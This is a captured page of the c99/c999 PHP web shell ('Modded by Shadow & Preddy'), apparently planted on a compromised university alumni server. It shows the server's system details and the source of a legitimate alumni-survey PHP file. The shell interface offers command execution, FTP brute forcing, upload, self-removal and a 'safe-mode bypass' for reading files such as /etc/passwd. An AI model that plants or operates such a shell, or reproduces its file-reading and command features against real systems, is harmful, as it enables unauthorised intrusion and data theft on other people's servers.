!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/admin/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processalumniqn.php (7.06 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "../../class/clsConnection.php";
include_once "../../class/clsDB.php";
include_once "../global.php";
include_once "../class/clsalumniqn.php";
include_once "../class/clsalumnibio.php";
include_once "../class/clsalumnimain.php";
include_once "../link/function.php";

$oAq = new AlumniQn($oC1);
$oAb = new AlumniBio($oC1);
$oAm = new AlumniMain($oC1);

if($method=="add"){
    $oAq->AddNew();
    $oAq->qnId=$oAq->GetNextCode();
    $oAq->alumniId=$alumniId;
    $oAq->checkwork=$checkwork;
    $oAq->checkedu=$checkedu;
    $oAq->startDateWork=splitDateForm($startDateWork,"/");
    $oAq->workPosition=$workPosition;
    $oAq->workSalary=$workSalary;
    $oAq->leveleduId=$leveleduId;
    $oAq->majoreduId=$majoreduId;
    $oAq->educationId=$educationId;
    $oAq->investiture=$investiture;
    $oAq->updateByPerson="S";
    $oAq->writeDate=splitDateForm(getNowDateFw2(),"/");

    $oAq->Save();
    
    $oAb->SearchByKey($alumniId);
    $oAb->GetRecord();
    $oAb->Edit();
    $oAb->alumniId=$alumniId;
    $oAb->studentId=$oAb->studentId;
    $oAb->nationId=$oAb->nationId;
    $oAb->religionId=$oAb->religionId;
    $oAb->bloodGroup=$oAb->bloodGroup;
    $oAb->birthDate=$oAb->birthDate;
    $oAb->birthProvinceId=$oAb->birthProvinceId;
    $oAb->homeAddress=$oAb->homeAddress;
    $oAb->homeDistrictId=$oAb->homeDistrictId;
    $oAb->homeAmphurId=$oAb->homeAmphurId;
    $oAb->homeProvinceId=$oAb->homeProvinceId;
    $oAb->homeZipcode=$oAb->homeZipcode;
    $oAb->homePhoneNo=$oAb->homePhoneNo;
    $oAb->officeName=$officeName;
    $oAb->officeAddress=$officeAddress;
    $oAb->officeDistrictId=$officeDistrictId;
    $oAb->officeAmphurId=$officeAmphurId;
    $oAb->officeProvinceId=$officeProvinceId;
    $oAb->officeZipcode=$officeZipcode;
    $oAb->officePhoneNo=$officePhoneNo;
    $oAb->workingStatus=$oAb->workingStatus;
    $oAb->workingPosition=$workPosition;
    $oAb->workingSalary=$workSalary;
    $oAb->fatherName=$oAb->fatherName;
    $oAb->fatherAddress=$oAb->fatherAddress;
    $oAb->fatherDistrictId=$oAb->fatherDistrictId;
    $oAb->fatherAmphurId=$oAb->fatherAmphurId;
    $oAb->fatherProvinceId=$oAb->fatherProvinceId;
    $oAb->fatherZipcode=$oAb->fatherZipcode;
    $oAb->fatherPhoneNo=$oAb->fatherPhoneNo;
    $oAb->fatherOccupation=$oAb->fatherOccupation;
    $oAb->fatherStatus=$oAb->fatherStatus;
    $oAb->motherName=$oAb->motherName;
    $oAb->motherAddress=$oAb->motherAddress;
    $oAb->motherDistrictId=$oAb->motherDistrictId;
    $oAb->motherAmphurId=$oAb->motherAmphurId;
    $oAb->motherProvinceId=$oAb->motherProvinceId;
    $oAb->motherZipcode=$oAb->motherZipcode;
    $oAb->motherPhoneNo=$oAb->motherPhoneNo;
    $oAb->motherOccupation=$oAb->motherOccupation;
    $oAb->motherStatus=$oAb->motherStatus;
    $oAb->studentSex=$oAb->studentSex;
    $oAb->parentName=$oAb->parentName;
    $oAb->parentRelation=$oAb->parentRelation;
    $oAb->parentAddress=$oAb->parentAddress;
    $oAb->parentDistrictId=$oAb->parentDistrictId;
    $oAb->parentAmphurId=$oAb->parentAmphurId;
    $oAb->parentProvinceId=$oAb->parentProvinceId;
    $oAb->parentZipcode=$oAb->parentZipcode;
    $oAb->parentPhoneNo=$oAb->parentPhoneNo;
    $oAb->parentMobile=$oAb->parentMobile;
    $oAb->parentOcc=$oAb->parentOcc;
    $oAb->parentIncome=$oAb->parentIncome;
    $oAb->parentEmail=$oAb->parentEmail;
    $oAb->contactPerson=$contactPerson;
    $oAb->contactAddress=$contactAddress;
    $oAb->contactDistrictId=$contactDistrictId;
    $oAb->contactAmphurId=$contactAmphurId;
    $oAb->contactProvinceId=$contactProvinceId;
    $oAb->contactZipcode=$contactZipcode;
    $oAb->contactPhoneNo=$contactPhoneNo;
    $oAb->cardExpiryDate=$oAb->cardExpiryDate;
    $oAb->currentAddress=$oAb->currentAddress;
    $oAb->currentDistrictId=$oAb->currentDistrictId;
    $oAb->currentAmphurId=$oAb->currentAmphurId;
    $oAb->currentProvinceId=$oAb->currentProvinceId;
    $oAb->currentZipcode=$oAb->currentZipcode;
    $oAb->currentPhoneNo=$oAb->currentPhoneNo;
    $oAb->graduateAddress=$oAb->graduateAddress;
    $oAb->graduateDistrictId=$oAb->graduateDistrictId;
    $oAb->graduateAmphurId=$oAb->graduateAmphurId;
    $oAb->graduateProvinceId=$oAb->graduateProvinceId;
    $oAb->graduateZipcode=$oAb->graduateZipcode;
    $oAb->graduatePhoneNo=$oAb->graduatePhoneNo;
    $oAb->maritalStatusId=$oAb->maritalStatusId;
    $oAb->weight=$oAb->weight;
    $oAb->height=$oAb->height;
    $oAb->picturePath=$oAb->picturePath;
    $oAb->recruitmentTypeId=$oAb->recruitmentTypeId;
    $oAb->occExamResult=$oAb->occExamResult;
    $oAb->canRefund=$oAb->canRefund;
    $oAb->oldStudentName=$oAb->oldStudentName;
    $oAb->entryDegree=$oAb->entryDegree;
    $oAb->healthPrivId=$oAb->healthPrivId;
    $oAb->o1prefixId=$oAb->o1prefixId;
    $oAb->o1fName=$oAb->o1fName;
    $oAb->o1lName=$oAb->o1lName;
    $oAb->o2prefixId=$oAb->o2prefixId;
    $oAb->o2fName=$oAb->o2fName;
    $oAb->o2lName=$oAb->o2lName;

    $oAb->Save();
    
    $oAm->SearchByKey($alumniId);
    $oAm->GetRecord();
    $oAm->Edit();
    $oAm->alumniId=$alumniId;
    $oAm->studentId=$oAm->studentId;
    $oAm->studentCode=$oAm->studentCode;
    $oAm->levelId=$oAm->levelId;
    $oAm->programId=$oAm->programId;
    $oAm->prefixId=$oAm->prefixId;
    $oAm->studentName=$oAm->studentName;
    $oAm->studentSurname=$oAm->studentSurname;
    $oAm->studentNameEng=$oAm->studentNameEng;
    $oAm->studentSurnameEng=$oAm->studentSurnameEng;
    $oAm->creditAttempt=$oAm->creditAttempt;
    $oAm->creditSatisfy=$oAm->creditSatisfy;
    $oAm->GPA=$oAm->GPA;
    $oAm->admitAcadYear=$oAm->admitAcadYear;
    $oAm->admitSemester=$oAm->admitSemester;
    $oAm->admitDate=$oAm->admitDate;
    $oAm->finishDate=$oAm->finishDate;
    $oAm->studentPassword=$oAm->studentPassword;
    $oAm->studentEmail=$studentEmail;
    $oAm->studentYear=$oAm->studentYear;
    $oAm->studentStatus=4;
    $oAm->officerId1=$oAm->officerId1;
    $oAm->officerId2=$oAm->officerId2;
    $oAm->financeStatus=$oAm->financeStatus;
    $oAm->updateUserId=$oAm->updateUserId;
    $oAm->updateDateTime=$oAm->updateDateTime;
    $oAm->citizenId=$oAm->citizenId;
    $oAm->graduateYear=$oAm->graduateYear;
    $oAm->genStatus=$oAm->genStatus;
    $oAm->genNo=$oAm->genNo;
    $oAm->entryTypeId=$oAm->entryTypeId;
    $oAm->entryTypeId2=$oAm->entryTypeId2;
    $oAm->studentSex=$oAm->studentSex;
    $oAm->scholarId=$oAm->scholarId;
    $oAm->preAdmitPositionId=$oAm->preAdmitPositionId;
    $oAm->totalPoint=$oAm->totalPoint;
    $oAm->honor=$oAm->honor;
    $oAm->medal=$oAm->medal;
    $oAm->exitExam=$oAm->exitExam;
    $oAm->studentStatusTmp=$oAm->studentStatusTmp;
    $oAm->importtoalumni='A';
    $oAm->glantId='N';
    $oAm->glantDate=$oAm->glantDate;
    $oAm->glantreqDate=$oAm->glantreqDate;
    $oAm->finishAcadYear=$oAm->finishAcadYear;
    
    $oAm->Save();
}else if($method=="edit"){
    $oAq->SearchByKey($qnId);
    $oAq->GetRecord();
    $oAq->Edit();
    $oAq->qnId=$qnId;
    $oAq->alumniId=$alumniId;
    $oAq->checkwork=$checkwork;
    $oAq->checkedu=$checkedu;
    $oAq->startDateWork=$startDateWork;
    $oAq->workPosition=$workPosition;
    $oAq->workSalary=$workSalary;
    $oAq->leveleduId=$leveleduId;
    $oAq->majoreduId=$majoreduId;
    $oAq->educationId=$educationId;
    $oAq->investiture=$investiture;
    $oAq->updateByPerson=$updateByPerson;
    $oAq->writeDate=$writeDate;

    $oAq->Save();
}else if($method=="delete"){
    $oAq->SearchByKey($qnId);
    $oAq->GetRecord();

    $oAq->Delete();
}

 echo "<meta http-equiv='refresh' content='0; URL=alumniQn.php?alumniId=$alumniId'>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0186 ]--